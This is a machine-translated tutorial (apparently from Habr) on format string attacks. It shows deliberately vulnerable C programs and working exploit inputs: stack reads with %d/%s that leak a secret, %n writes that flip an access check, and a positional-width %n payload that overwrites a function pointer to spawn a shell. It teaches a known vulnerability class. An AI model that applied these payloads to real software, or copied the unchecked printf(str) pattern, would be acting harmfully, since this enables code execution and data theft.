📜 ⬆️ ⬇️

Printf Oriented Programming



Intro


To my surprise, I did not find articles on this topic and this article I would like to correct the situation. In it, I will try to tell the most intelligible of the attacker about Format String Attacks , but with some simplifications. In practice, they are quite simply resolved, but do not really want to dwell on them. In addition, the most persistent, to the end, in addition to invaluable knowledge, is waiting for a small bonus.

Why is it even needed?


Like other vulnerabilities, you need Format String Attacks in order to gain unauthorized access to the program and do whatever you want with it. One of the important features of this vulnerability is indifference to additional measures of protection like w ^ x and ASLR . And most importantly, it allows you to circumvent the relatively new CFI protection.

Let's start?


As it always seemed to me best to understand what is happening with examples, so without further words to the code immediately.
')
#include <stdio.h> void f(char *str) { char *secret_data = "My Awesome Key"; printf(str); } int main(int argc, char **argv) { f(argv[1]); return 0; } 

For those who forgot about printf
The printf () - like functions work like this:

  • Display string
  • Replace special characters starting with%
  • Return the number of characters successfully printed


What can we do about it? Let's compile our code and run it. Here and further we will work with x86-32.

 $ cc -m32 format_vuln.c -o format_vuln $ ./format_vuln %d 47 

I wonder where did 47 come from? We asked to display "% d". Actually, the function was written in C. Since operator overloading is not there, she does not know how many arguments she was given, so she orients herself to the first argument, which parses the string and with each% takes the next argument from the stack.

Where did all the 47 come from?
The fact is that for performance, values ​​on the stack are not reset. The allocation / release of memory occurs by decreasing / increasing the corresponding pointer on the stack. So 47 is just some arbitrary number of some side calculations.

After playing a little you can get the coveted key.

 $ ./format_vuln %d.%d.%d.%d.%d.%d.%s 47.-145670960.-143695128.32768.-143929344.-143936984.My Awesome Key 

Why exactly 6% d?


Let's look at the disassembled listing of the f function using objdump:

 080483fb <f>: 80483fb: 55 push ebp 80483fc: 89 e5 mov ebp,esp 80483fe: 83 ec 18 sub esp,0x18 8048401: c7 45 f4 d0 84 04 08 mov DWORD PTR [ebp-0xc],0x80484d0 8048408: 83 ec 0c sub esp,0xc 804840b: ff 75 08 push DWORD PTR [ebp+0x8] 804840e: e8 bd fe ff ff call 80482d0 <printf@plt> 8048413: 83 c4 10 add esp,0x10 8048416: 90 nop 8048417: c9 leave 8048418: c3 ret 

At the address 0x80484d0, our key is stored and written to the stack at ebp-0xc . Our first argument is at ebp + 0x8 .

According to the instructions sub esp, 0x ** allocated the right place on the stack. And clearly stands out a lot of excess. This alignment of the data (padding) also becomes it automatically compilers, for productivity.

Total if you look at the stack before calling printf, then it becomes clear where these 6% d come from.



Unpopular features printf


In addition to potential data leakage, printf has other interesting features.


For example, having the following code:

 #include <stdio.h> int main() { int i, j; printf("Hello%2$n, world!%1$n\n", &i, &j); printf("%d %*d", i, 3, j); return 0; } 

we get this conclusion:

 $ cc -m32 printfwrite.c -oprintfwrite $ ./printfwrite Hello, world! 13 5 

This functionality opens up new possibilities for exploitation. Let's change our old code a bit and see what we can do with it.

 #include <stdio.h> #include <stdlib.h> void f(char *str, int acc) { int *access = &acc; printf(str); if (*access) { puts("Secret information revealed!"); } } int main(int argc, char **argv) { char *usr = getenv("USER"); if(usr==NULL) return EXIT_FAILURE; f(argv[1], usr == "kitsu"); return 0; } 

 $ cc -m32 printfacccess.c -m32 -o printfacccess $ ./printfacccess %d.%d.%d.%d.%d.%d.%n -4922064.2.4.-4922088.-143168832.-145108519.Secret information revealed! 

But what if the number we need to write is very large? For example, the address of the function. The first thing that comes to mind is to submit a string of appropriate sizes. Let's say we have a shellcode address, and also have control over printf, what do we do?

 #include <stdio.h> #include <stdlib.h> typedef void(*fptr)(); void routine() { /* do something useful */ puts("Routine done."); } void shell() { execve("/bin/bash", 0, 0); } void f(char *str, fptr p) { fptr ptr = p; printf(str); ptr(); } int main(int argc, char **argv) { f(argv[1], routine); return 0; } 

The shell address of interest after compilation is 0x80484d4. We print an arbitrary character as many times, and then rewrite the function pointer.

 $ cc -m32 printfshell.c -oprintfshell $ ./printfshell `python -c 'print("0"*0x80484d4 + "%n")'` bash: ./printfshell: Argument list too long 

Alas, bashu this idea was not very liking. But we can achieve a similar effect with the help of the already mentioned output width, and then write the number in the same way with% n.

 $ ./printfshell `python -c 'print("%1$134513876.0X%7$n")'` >out $ echo "$$" $ exit exit $ echo "$$" 3899 $ tail -c 4 out 3920 

And now let's take a closer look at what miracles happened here. Here we launched our program and launched a new instance of the shell we needed.

And what all the same "% 1 $ 134513876.0X% 7 $ n" mean?


It consists of two executable characters "% 1 $ 134513876.0X" and "% 7 $ n" .

% 1 $ 134513876.0X - output to stdout of the first argument passed, with a long field of 134513876 (this is the address of our shellcode). What is displayed does not matter, the main thing is the number of characters.

% 7 $ n - writes to 7 arguments. He writes down just the number of characters that we derived, i.e. shellcode address

In custody


As you can see, the printf () - like functions have enormous power. Moreover, absolute, because as it turned out they are still turing-complete , which means that they can potentially contain everything that a hacker would like.

How? This is achieved by fairly long and complex sequences with which you can play, for example , here . The guys from usenix compiled the brainfuck code in the format-string sequence. In the repository there are examples like Fibonacci numbers, 99 bottles of beer and a lot of interesting things.

Source: https://habr.com/ru/post/274329/


All Articles